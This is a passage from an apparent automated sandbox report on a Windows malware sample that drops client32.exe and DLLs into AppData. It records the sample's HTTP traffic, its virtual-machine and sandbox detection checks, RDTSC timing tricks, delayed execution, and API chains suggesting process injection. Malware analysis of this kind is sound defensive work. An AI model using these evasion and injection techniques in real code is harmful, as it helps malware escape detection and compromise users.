Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,	3_2_11139ED0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	3_2_110C1020
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11113380 IsIconic,GetTickCount,	3_2_11113380
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	3_2_110CB750
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	3_2_110CB750
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	3_2_111236E0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	3_2_111236E0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	3_2_11025A90
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	3_2_1115BAE0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	3_2_1115BAE0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	3_2_11113FA0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,	3_2_11025EE0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	3_2_1115BEE0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	3_2_110241A0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	3_2_11024880
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	11_2_110C1020
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11113380 IsIconic,GetTickCount,	11_2_11113380
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	11_2_110CB750
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	11_2_110CB750
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	11_2_111236E0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	11_2_111236E0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	11_2_11025A90
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	11_2_1115BAE0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	11_2_1115BAE0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	11_2_11113FA0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,	11_2_11139ED0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,	11_2_11025EE0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	11_2_1115BEE0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	11_2_110241A0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	11_2_11024880

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,

3_2_11029BB0

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Delayed program exit found

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_110B86C0 Sleep,ExitProcess,		3_2_110B86C0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_110B86C0 Sleep,ExitProcess,		11_2_110B86C0

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	System information queried: FirmwareTableInformation	Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File opened: HKEY_LOCAL_MACHINE\SOFTWARE\Wine	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

RDTSC instruction interceptor: First address: 4F9EF6 second address: 4D2D4B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 mov ebx, dword ptr [esp+04h] 0x00000007 lea ebx, dword ptr [ebx+6Ch] 0x0000000a xchg dword ptr [esp+04h], ebx 0x0000000e mov dword ptr [esp+04h], ebx 0x00000012 mov ebx, dword ptr [esp] 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 and eax, 00000001h 0x0000001e push ebx 0x0000001f mov ebx, dword ptr [esp+04h] 0x00000023 lea ebx, dword ptr [ebx+39h] 0x00000026 xchg dword ptr [esp+04h], ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e mov ebx, dword ptr [esp] 0x00000031 lea esp, dword ptr [esp+04h] 0x00000035 xchg eax, edx 0x00000036 xchg dword ptr [esp], eax 0x00000039 xchg eax, edx 0x0000003a lea esp, dword ptr [esp+04h] 0x0000003e xchg eax, esi 0x0000003f xchg dword ptr [esp], esi 0x00000042 xchg eax, esi 0x00000043 lea esp, dword ptr [esp+04h] 0x00000047 je 00007F1328455CABh 0x0000004d popfd 0x0000004e lea esi, dword ptr [esi] 0x00000050 je 00007F132852AD0Dh 0x00000056 jmp 00007F13285607C0h 0x0000005b pushfd 0x0000005c push ecx 0x0000005d mov ecx, dword ptr [esp+04h] 0x00000061 lea ecx, dword ptr [ecx+4Fh] 0x00000064 xchg dword ptr [esp+04h], ecx 0x00000068 mov dword ptr [esp+04h], ecx 0x0000006c mov ecx, dword ptr [esp] 0x0000006f lea esp, dword ptr [esp+04h] 0x00000073 xchg eax, edx 0x00000074 lea esp, dword ptr [esp-04h] 0x00000078 mov dword ptr [esp], edx 0x0000007b mov edx, eax 0x0000007d mov eax, dword ptr [esp] 0x00000080 xchg edi, edx 0x00000082 lea esp, dword ptr [esp-04h] 0x00000086 mov dword ptr [esp], edi 0x00000089 mov edi, edx 0x0000008b mov edx, dword ptr [esp] 0x0000008e rdtsc

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosDate	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

Code function: 0_2_0045467A rdtsc

0_2_0045467A

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

0_2_02291C53

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

Code function: 0_2_004507AE sgdt fword ptr [eax]

0_2_004507AE

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Window / User API: threadDelayed 3944			Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Window / User API: threadDelayed 5232			Jump to behavior

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SuportUpWin\AudioCapture.dll	Jump to dropped file
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SuportUpWin\TCCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SuportUpWin\remcmdstub.exe	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Evaded block: after key decision	graph_3-104350
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Evaded block: after key decision	graph_3-108450
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Evaded block: after key decision	graph_3-108849
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Evaded block: after key decision	graph_3-109129
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Evaded block: after key decision	graph_3-109296
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Evaded block: after key decision

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Evasive API call chain: GetLocalTime,DecisionNodes			graph_3-108589

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_3-104015

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	API coverage: 4.7 %
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	API coverage: 2.1 %

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe TID: 5992	Thread sleep time: -986000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe TID: 5992	Thread sleep time: -1308000s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_004093B9 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,GetLastError,	0_2_004093B9
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0040DB4C GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,FindFirstFileW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0040DB4C
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_022AAFC7 FindFirstFileExW,	0_2_022AAFC7
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	3_2_111273E0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	3_2_1102D9F4
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	3_2_1102DD21
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	3_2_1110BD70
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	3_2_110663B0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	3_2_1106ABD0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF3EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	3_2_6CF3EFE1
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF40F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	3_2_6CF40F84
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF3CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,	3_2_6CF3CA9B
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF40B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	3_2_6CF40B33
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF3C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,	3_2_6CF3C775
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF40702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	3_2_6CF40702
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF07C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	3_2_6CF07C6D
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF3FD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	3_2_6CF3FD86
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	11_2_1102D900
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	11_2_111273E0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1110BD70 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	11_2_1110BD70
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	11_2_110663B0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	11_2_1106ABD0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF3EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	11_2_6CF3EFE1
